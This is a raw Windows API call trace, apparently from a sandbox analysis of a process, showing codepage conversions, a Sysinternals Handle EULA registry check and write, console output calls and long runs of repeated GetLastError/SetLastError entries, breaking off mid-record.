\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0298.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0298.535] GetLastError () returned 0x0 [0298.535] SetLastError (dwErrCode=0x0) [0298.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0298.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0298.535] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0298.535] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0298.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0298.535] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140010890) returned 0x0 [0298.536] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffaf70d0000 [0298.536] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="IsWow64Process") returned 0x7ffaf70ee960 [0298.536] GetCurrentProcess () returned 0xffffffffffffffff [0298.536] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x14fef0 | out: Wow64Process=0x14fef0) returned 1 [0298.536] GetLastError () returned 0x0 [0298.536] SetLastError (dwErrCode=0x0) [0298.536] GetLastError () returned 0x0 [0298.536] SetLastError (dwErrCode=0x0) [0298.536] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x0) returned 0x2 [0298.536] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x14c) returned 0x0 [0298.536] RegQueryValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x14fc40, lpcbData=0x14fc48*=0x4 | out: lpType=0x0, lpData=0x14fc40*=0x0, lpcbData=0x14fc48*=0x4) returned 0x2 [0298.536] RegCloseKey (hKey=0x14c) returned 0x0 [0298.536] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x14c) returned 0x0 [0298.536] RegQueryValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x14fc40, lpcbData=0x14fc48*=0x4 | out: lpType=0x0, lpData=0x14fc40*=0x1, lpcbData=0x14fc48*=0x4) returned 0x0 [0298.536] RegCloseKey (hKey=0x14c) returned 0x0 [0298.536] GetLastError () returned 0x0 [0298.536] SetLastError (dwErrCode=0x0) [0298.536] GetLastError () returned 0x0 [0298.536] SetLastError (dwErrCode=0x0) [0298.536] RegCreateKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", phkResult=0x14fc38 | out: phkResult=0x14fc38*=0x14c) returned 0x0 [0298.536] RegSetValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", Reserved=0x0, dwType=0x4, lpData=0x14fc30*=0x1, cbData=0x4 | out: lpData=0x14fc30*=0x1) returned 0x0 [0298.537] RegCloseKey (hKey=0x14c) returned 0x0 [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.537] SetLastError (dwErrCode=0x0) [0298.537] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.538] SetLastError (dwErrCode=0x0) [0298.538] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.539] SetLastError (dwErrCode=0x0) [0298.539] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.540] GetLastError () returned 0x0 [0298.540] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.541] GetLastError () returned 0x0 [0298.541] SetLastError (dwErrCode=0x0) [0298.542] GetLastError () returned 0x0 [0298.542] SetLastError (dwErrCode=0x0) [0298.542] GetLastError () returned 0x0 [0298.542] SetLastError (dwErrCode=0x0) [0298.542] GetLastError () returned 0x0 [0298.542] SetLastError (dwErrCode=0x0) [0298.542] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0299.290] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x65, lpOverlapped=0x0) returned 1 [0299.516] GetLastError () returned 0x0 [0299.516] SetLastError (dwErrCode=0x0) [0299.516] GetLastError () returned 0x0 [0299.516] SetLastError (dwErrCode=0x0) [0299.516] GetLastError () returned 0x0 [0299.516] SetLastError (dwErrCode=0x0) [0299.516] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.517] GetLastError () returned 0x0 [0299.517] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.518] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.518] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.518] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.518] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.518] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.518] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.518] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.518] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.518] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.518] SetLastError (dwErrCode=0x0) [0299.518] GetLastError () returned 0x0 [0299.519] SetLastError (dwErrCode=0x0) [0299.519] GetLastError () returned 0x0 [0299.519] SetLastError (dwErrCode=0x0) [0299.519] GetLastError () returned 0x0 [0299.519] SetLastError (dwErrCode=0x0) [0299.519] GetLastError () returned 0x0 [0299.519] SetLastError (dwErrCode=0x0) [0299.519] GetLastError () returned 0x0 [0299.519] SetLastError (dwErrCode=0x0) [0299.519] GetLastError () returned 0x0 [0299.519] SetLastError (dwErrCode=0x0) [0299.519] GetLastError () returned 0x0 [0299.519] SetLastError (dwErrCode=0x0) [0299.519] GetLastError () returned 0x0 [0299.519] SetLastError (dwErrCode=0x0) [0299.519] GetLastError () returned 0x0 [0299.519] SetLastError (dwErrCode=0x0) [0299.519] GetLastError () returned 0x0 [0299.519] SetLastError (dwErrCode=0x0) [0299.519] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0299.682] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x2c, lpOverlapped=0x0) returned 1 [0299.979] GetLastError () returned 0x0 [0299.979] SetLastError (dwErrCode=0x0) [0299.979] GetLastError () returned 0x0 [0299.979] SetLastError (dwErrCode=0x0) [0299.979] GetLastError () returned 0x0 [0299.979] SetLastError (dwErrCode=0x0) [0299.979] GetLastError () returned 0x0 [0299.979] SetLastError (dwErrCode=0x0) [0299.979] GetLastError () returned 0x0 [0299.979] SetLastError (dwErrCode=0x0) [0299.979] GetLastError () returned 0x0 [0299.979] SetLastError (dwErrCode=0x0) [0299.979] GetLastError () returned 0x0 [0299.979] SetLastError (dwErrCode=0x0) [0299.979] GetLastError () returned 0x0 [0299.979] SetLastError (dwErrCode=0x0) [0299.979] GetLastError () returned 0x0 [0299.979] SetLastError (dwErrCode=0x0) [0299.979] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.980] SetLastError (dwErrCode=0x0) [0299.980] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] 